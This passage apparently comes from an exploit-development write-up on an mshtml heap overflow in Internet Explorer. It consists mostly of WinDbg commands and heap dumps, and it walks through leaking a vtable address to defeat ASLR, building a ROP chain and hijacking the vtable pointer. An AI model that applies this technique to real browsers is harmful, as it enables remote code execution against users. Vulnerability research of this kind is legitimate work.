The vulheap buffer is allocated from CTableLayout::CalculateMinMax through CImplAry::EnsureSizeWorker, and the resulting pointer is stored at [ebx+9c] (offset 0x9c into the CTableLayout object, as seen earlier). The instruction after the call is at mshtml!CTableLayout::CalculateMinMax+0x16d, so a breakpoint there prints the vulheap address:

0:005> bu mshtml!CTableLayout::CalculateMinMax+0x16d ".echo vulheap;dd poi(ebx+9c) l4;g"

The log output is long, so save it to a file:

0:005> .logopen c:\log.txt
Opened log file 'c:\log.txt'

When recording is finished, close the log with .logclose:

0:005> .logclose
Closing open log file c:\log.txt

In the saved log, the last vulheap entry is the one we want:

free heap
083f2ef0  e8 d2 56 69 00 0d 4c 00-d0 62 83 04 38 04 4c 00  ..Vi..L..b..8.L.
free heap
00000000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
free heap
00000000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
free heap
00000000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
(3f4.c0): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000009 ebx=083f5d20 ecx=00000000 edx=00000009 esi=022ac580 edi=00000000
eip=694ba1b2 esp=020b3000 ebp=022ac2ec iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CTableLayout::CalculateMinMax+0x175:
694ba1b2 50              push    eax

To determine the vftable offset, look it up dynamically:

0:005> x mshtml!CButtonLayout::*
6956f069          mshtml!CButtonLayout::GetThemeClassId (<no parameter info>)
695ee9c5          mshtml!CButtonLayout::GetInsets (<no parameter info>)
69508690          mshtml!CButtonLayout::`vftable' = <no type information>
6959cf35          mshtml!CButtonLayout::GetAutoSize (<no parameter info>)
69785a7c          mshtml!CButtonLayout::HitTestContent (<no parameter info>)
6955d2e3          mshtml!CButtonLayout::DrawClientBackground (<no parameter info>)
69509211          mshtml!CButtonLayout::Init (<no parameter info>)
6959cf35          mshtml!CButtonLayout::GetMultiLine (<no parameter info>)
696f1080          mshtml!CButtonLayout::s_layoutdesc = <no type information>
69785a6c          mshtml!CButtonLayout::GetBtnHelper (<no parameter info>)
697858a7          mshtml!CButtonLayout::GetFocusShape (<no parameter info>)
696f1079          mshtml!CButtonLayout::GetLayoutDesc (<no parameter info>)
69785a07          mshtml!CButtonLayout::DoLayout (<no parameter info>)
6956f069          mshtml!CButtonLayout::GetWordWrap (<no parameter info>)
695084f8          mshtml!CButtonLayout::`vftable' = <no type information>
6955d2af          mshtml!CButtonLayout::DrawClient (<no parameter info>)
695d36c1          mshtml!CButtonLayout::`scalar deleting destructor' (<no parameter info>)
697856e7          mshtml!CButtonLayout::DrawClientBorder (<no parameter info>)
695d36c1          mshtml!CButtonLayout::`vector deleting destructor' (<no parameter info>)
695eeb59          mshtml!CButtonLayout::GetDefaultSize (<no parameter info>)

Oddly, there are two vftables; I do not know why.

Finally, dump vulheap:

1:026> db 03f2ae30 l101c
03f2ae30  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2ae40  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2ae50  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2ae60  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2ae70  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2ae80  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2ae90  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2aea0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2aeb0  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2aec0  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2aed0  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2aee0  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2aef0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2af00  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2af10  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2af20  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2af30  04 10 00 00 04 10 00 00-0c 61 81 04 00 00 00 00  .........a......
03f2af40  02 00 00 00 48 00 01 00-04 10 00 00 04 10 00 00  ....H...........
03f2af50  04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
03f2af60  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2af70  41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00  A.A.A.A.A.A.H...
03f2af80  04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00  ............A.A.
03f2af90  41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00  A.A.A.A.H.......
03f2afa0  04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00  ........A.A.A.A.
03f2afb0  41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00  A.A.H...........
03f2afc0  04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
03f2afd0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2afe0  41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00  A.A.A.A.A.A.H...
03f2aff0  04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00  ............A.A.
03f2b000  41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00  A.A.A.A.H.......
03f2b010  04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00  ........A.A.A.A.
03f2b020  41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00  A.A.H...........
03f2b030  04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
03f2b040  48 00 01 00 41 00 00 00-20 10 d1 01 00 00 00 c2  H...A... .......
03f2b050  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2b060  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2b070  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b080  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b090  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0a0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0b0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0c0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0d0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0e0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0f0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b100  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b110  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b120  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b130  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b140  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b150  42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00  B.B.B.B.B.B.B...
03f2b160  05 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00  .........j......
03f2b170  02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01  .........:.h..7.
03f2b180  70 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00  p....<.h........
03f2b190  09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00  ................
03f2b1a0  00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff  ................
03f2b1b0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b1c0  00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00  ....$... .......
03f2b1d0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b1e0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b1f0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b200  00 00 00 00 00 00 00 00-00 00 00 00 28 b2 f2 03  ............(...
03f2b210  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b220  01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b230  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b240  ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff  ................
03f2b250  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b260  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b270  00 00 00 00 00 00 00 00-66 10 d1 01 00 00 00 c2  ........f.......
03f2b280  a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05  .0..............
03f2b290  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b2a0  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b2b0  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b2c0  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b2d0  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b2e0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b2f0  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b300  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b310  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b320  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b330  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b340  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b350  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b360  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b370  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b380  45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00  E.E.A.E.H...E...
03f2b390  5b 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00  [........a......
03f2b3a0  02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00  ............A.A.
03f2b3b0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3c0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3d0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3e0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3f0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b400  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b410  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b420  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b430  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b440  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b450  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b460  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b470  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b480  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b490  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b4a0  41 00 41 00 41 00 00 00-bc 10 d1 01 00 00 00 c2  A.A.A...........
03f2b4b0  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2b4c0  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2b4d0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b4e0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b4f0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b500  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b510  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b520  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b530  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b540  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b550  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b560  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b570  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b580  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b590  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b5a0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b5b0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00  B.B.B.B.B.B.B...
03f2b5c0  91 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00  .........j......
03f2b5d0  02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01  .........:.h..7.
03f2b5e0  e0 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00  .....<.h........
03f2b5f0  09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00  ................
03f2b600  00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff  ................
03f2b610  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b620  00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00  ....$... .......
03f2b630  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b640  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b650  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b660  00 00 00 00 00 00 00 00-00 00 00 00 88 b6 f2 03  ................
03f2b670  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b680  01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b690  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b6a0  ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff  ................
03f2b6b0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b6c0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b6d0  00 00 00 00 00 00 00 00-f2 10 d1 01 00 00 00 c2  ................
03f2b6e0  a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05  .0..............
03f2b6f0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b700  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b710  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b720  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b730  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b740  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b750  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b760  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b770  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b780  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b790  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b7a0  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b7b0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b7c0  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b7d0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b7e0  45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00  E.E.A.E.H...E...
03f2b7f0  d7 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00  .........a......
03f2b800  02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00  ............A.A.
03f2b810  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b820  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b830  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b840  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b850  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b860  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b870  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b880  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b890  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8a0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8b0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8c0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8d0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8e0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8f0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b900  41 00 41 00 41 00 00 00-08 11 d1 01 00 00 00 c2  A.A.A...........
03f2b910  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2b920  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2b930  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b940  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b950  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b960  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b970  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b980  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b990  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9a0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9b0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9c0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9d0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9e0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9f0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2ba00  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2ba10  42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00  B.B.B.B.B.B.B...
03f2ba20  6d 11 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00  m........j......
03f2ba30  02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01  .........:.h..7.
03f2ba40  50 91 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00  P....<.h........
03f2ba50  09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00  ................
03f2ba60  00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff  ................
03f2ba70  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2ba80  00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00  ....$... .......
03f2ba90  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2baa0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bab0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bac0  00 00 00 00 00 00 00 00-00 00 00 00 e8 ba f2 03  ................
03f2bad0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bae0  01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
03f2baf0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bb00  ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff  ................
03f2bb10  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bb20  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bb30  00 00 00 00 00 00 00 00-4e 11 d1 01 00 00 00 c2  ........N.......
03f2bb40  a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05  .0..............
03f2bb50  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2bb60  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2bb70  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2bb80  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2bb90  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2bba0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2bbb0  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2bbc0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2bbd0  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2bbe0  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2bbf0  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2bc00  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2bc10  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2bc20  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2bc30  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2bc40  45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00  E.E.A.E.H...E...
03f2bc50  a3 11 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00  .........a......
03f2bc60  02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00  ............A.A.
03f2bc70  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bc80  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bc90  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bca0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcb0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcc0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcd0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bce0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcf0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd00  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd10  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd20  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd30  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd40  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd50  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd60  41 00 41 00 41 00 00 00-84 11 d1 01 00 00 00 c2  A.A.A...........
03f2bd70  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2bd80  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2bd90  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bda0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdb0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdc0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdd0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bde0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdf0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be00  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be10  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be20  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be30  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be40  42 00 42 00 42 00 42 00-42 00 42 00              B.B.B.B.B.B.

It is easy to see that the AAAA string at 03f2ae30 has been overwritten at length, so that chunk is the vulnerable heap buffer (vulheap). Once the vtable address has been read out, the mshtml base address is computed from it and the ROP chain is built. The overflow is then triggered a second time; this time it is sized like the BBBB overwrite just observed so that it lands directly on the vtable pointer, which can therefore be hijacked to an arbitrary address, as shown below:

(6cc.7f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07070024--->the controlled vtable pointer ebx=01000000 ecx=040f8910 edx=00000041 esi=0375f530 edi=040e0790
eip=003d006b esp=0375f368 ebp=0375f3a0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
003d006b 777a            ja      003d00e7                                [br=1]
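
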